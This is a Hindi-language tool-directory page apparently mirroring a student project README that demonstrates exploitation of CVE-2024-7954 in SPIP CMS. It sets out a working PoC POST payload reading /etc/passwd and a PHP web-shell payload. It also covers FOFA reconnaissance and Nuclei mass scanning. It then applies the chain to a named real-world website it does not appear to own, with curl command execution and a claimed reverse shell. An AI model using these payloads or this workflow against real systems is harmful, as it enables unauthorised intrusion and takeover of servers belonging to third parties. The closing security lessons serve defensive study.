Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954- — रिमोट कोड एक्ज़ीक्यूशन कमजोरी का शोषण - (CVE-2024-7954) | Kitploit
उपकरण/GitHubGitHub/shivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-
टोहीवेब भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
पेलोड डेवलपमेंट
लैब और अभ्यास
GitHubshivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-

Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954-

रिमोट कोड एक्ज़ीक्यूशन कमजोरी का शोषण - (CVE-2024-7954)

रिपॉजिटरी देखें
139 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

रिमोट कोड निष्पादन भेद्यता (CVE-2024-7954) का शोषण

सॉफ्टवेयर भेद्यता परीक्षण परियोजना प्रस्तुतकर्ता: शिवांश कुंतल


अवलोकन

यह परियोजना CVE-2024-7954 के शोषण का प्रदर्शन करती है, जो SPIP CMS को इसके porte_plume प्लगइन के माध्यम से प्रभावित करने वाली एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है। यह भेद्यता अप्रमाणित हमलावरों को क्राफ्टेड HTTP POST अनुरोधों के माध्यम से लक्ष्य सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देती है।

परीक्षण एक नियंत्रित स्थानीय वातावरण में किया गया और बाद में FOFA और Nuclei का उपयोग करके वास्तविक दुनिया की टोह लेने के लिए विस्तारित किया गया।


1. वातावरण सेटअप

SPIP CMS का एक भेद्य संस्करण, जो CVE-2024-7954 से प्रभावित होने की पुष्टि की गई है, को GitHub रिपॉजिटरी का उपयोग करके स्थानीय रूप से Apache सर्वर पर तैनात किया गया, जो ज्ञात-भेद्य रिलीज़ होस्ट करता है।

उपयोग किए गए उपकरण

  • Burp Suite (HTTP अनुरोधों को इंटरसेप्ट और संशोधित करना)
  • Apache Web Server
  • FOFA Search Engine
  • Nuclei Vulnerability Scanner
  • curl (CLI शोषण)

localhost पर चल रहा SPIP होमपेज सफल स्थापना को मान्य करता है और शोषण के लक्ष्य के रूप में कार्य करता है।


2. भेद्यता विवरण

porte_plume प्लगइन (संस्करण 4.30-alpha2, 4.2.13, 4.1.16 से पहले) उपयोगकर्ता द्वारा प्रदान किए गए इनपुट के अपर्याप्त स्वच्छता के कारण भेद्य है। हमलावर विशिष्ट फॉर्म फ़ील्ड में PHP कोड इंजेक्ट कर सकते हैं जो बाद में सर्वर द्वारा रेंडर और निष्पादित किया जाता है।

प्रभाव: अप्रमाणित रिमोट कोड निष्पादन गंभीरता: गंभीर हमला वेक्टर: नेटवर्क / HTTP POST


3. प्रूफ ऑफ कॉन्सेप्ट (PoC)

दुर्भावनापूर्ण POST अनुरोध

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

नोट्स

  • PHP कोड मार्कडाउन फ़ॉर्मेटिंग इंजन के अंदर इंजेक्ट किया जाता है।
  • सर्वर पर SPIP उपयोगकर्ता के रूप में निष्पादित होता है।
  • हमले के लिए कोई प्रमाणीकरण आवश्यक नहीं है।

4. FOFA टोही

सार्वजनिक SPIP इंस्टॉलेशन की गणना करने के लिए FOFA क्वेरी का उपयोग किया गया:

root@kitploit:~
app="SPIP"

FOFA ने कई मेटाडेटा बिंदु लौटाए:

  • HTTP हेडर
  • शीर्षक
  • IP पते और भू-स्थान
  • सर्वर टेक्नोलॉजी स्टैक

टोही मूल्य

  1. लक्ष्य गणना: पहुंच योग्य SPIP CMS सर्वरों की पहचान करें।
  2. संस्करण फिंगरप्रिंटिंग: निर्धारित करें कि क्या भेद्य प्लगइन संस्करण सक्रिय हैं।
  3. प्राथमिकता: संभावित शोषण योग्य सिस्टम का चयन करें।
  4. शोषण सत्यापन: नियंत्रित पेलोड का उपयोग करके एंडपॉइंट को मान्य करें।
  5. स्वचालन: बैच स्कैनिंग के लिए FOFA परिणामों को targets.txt में निर्यात करें।

पहचान किया गया एक उपयुक्त वास्तविक दुनिया का होस्ट:

root@kitploit:~
http://www.comite-tricolore.org/

5. Nuclei के साथ स्वचालित स्कैनिंग

उद्देश्य

चूंकि मैन्युअल शोषण धीमा है, इसलिए Nuclei का उपयोग बड़े लक्ष्य सेट पर CVE-2024-7954 का पता लगाने को स्वचालित करने के लिए किया गया।

कमांड (कस्टम टेम्पलेट)

root@kitploit:~
nuclei -l targets.txt -t CVE-2024-7954.yaml
  • -l targets.txt FOFA परिणाम लोड करता है
  • -t कस्टम PoC टेम्पलेट लोड करता है

नोट: प्रारंभिक टेम्पलेट ने कोई मिलान नहीं लौटाया।

व्यापक CVE स्कैन

root@kitploit:~
nuclei -l targets.txt -t cves/

इस स्कैन ने एक प्रतिक्रियाशील लक्ष्य की पहचान की:

root@kitploit:~
http://www.comite-tricolore.org/

6. मैन्युअल सत्यापन और शोषण

चरण 1 — भेद्य एंडपॉइंट का निरीक्षण करें

यहां जाएं:

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact

पुष्टि की:

  • नाम, ईमेल, संदेश के लिए इनपुट फ़ील्ड
  • पेलोड इंजेक्शन के लिए उपयुक्त POST अनुरोध हैंडलर

चरण 2 — PHP पेलोड इंजेक्ट करें

Burp Suite या curl का उपयोग करके, message पैरामीटर को संशोधित करें:

पेलोड

root@kitploit:~
<?php system($_GET['cmd']); ?>

चरण 3 — कमांड निष्पादन ट्रिगर करें

यहां जाएं:

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id

या curl का उपयोग करें:

root@kitploit:~
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"

आउटपुट ने रिमोट कमांड निष्पादन की पुष्टि की।

चरण 4 — रिवर्स शेल (अंतिम पहुंच)

एक क्राफ्टेड पेलोड रिवर्स शेल कॉलबैक को सक्षम करता है, जिससे अनुमति मिलती है:

  • whoami
  • ls
  • पूर्ण इंटरैक्टिव शेल पहुंच

7. महत्वपूर्ण अवलोकन

  • अप्रमाणित शोषण गंभीरता को नाटकीय रूप से बढ़ाता है।
  • प्लगइन में इनपुट स्वच्छता विफलता मुख्य मुद्दा है।
  • एक बार PHP इंजेक्ट और रेंडर हो जाने के बाद, पूर्ण सर्वर समझौता संभव है।
  • रिवर्स शेल → संभावित विशेषाधिकार वृद्धि → सर्वर अधिग्रहण।
  • curl, Python स्क्रिप्ट या Nuclei के साथ हमला स्वचालित करना आसान है।

8. निष्कर्ष

यह परियोजना CVE-2024-7954 के लिए टोही से लेकर इंटरैक्टिव शेल प्राप्त करने तक की पूर्ण शोषण श्रृंखला का प्रदर्शन करती है।

शोषण पथ

  1. टोही (FOFA)
  2. स्वचालित स्कैनिंग (Nuclei)
  3. मैन्युअल पेलोड इंजेक्शन
  4. सत्यापित कोड निष्पादन
  5. रिवर्स शेल पहुंच

सुरक्षा सबक

  • सभी उपयोगकर्ता-नियंत्रित डेटा के लिए सख्त इनपुट सत्यापन अनिवार्य है।
  • प्लगइन्स को सुरक्षित कोडिंग प्रथाओं का पालन करना चाहिए।
  • संगठनों को तुरंत सुरक्षा पैच लागू करना चाहिए।
  • RCE हमलों को रोकने के लिए नियमित भेद्यता मूल्यांकन आवश्यक है।

यह भेद्यता इस बात पर प्रकाश डालती है कि एक प्रतीत होने वाला हानिरहित टेक्स्ट फ़ॉर्मेटिंग प्लगइन, जब अनुचित रूप से सुरक्षित हो, तो एक पूर्ण सिस्टम समझौता कैसे बना सकता है।

टूल डाउनलोड करें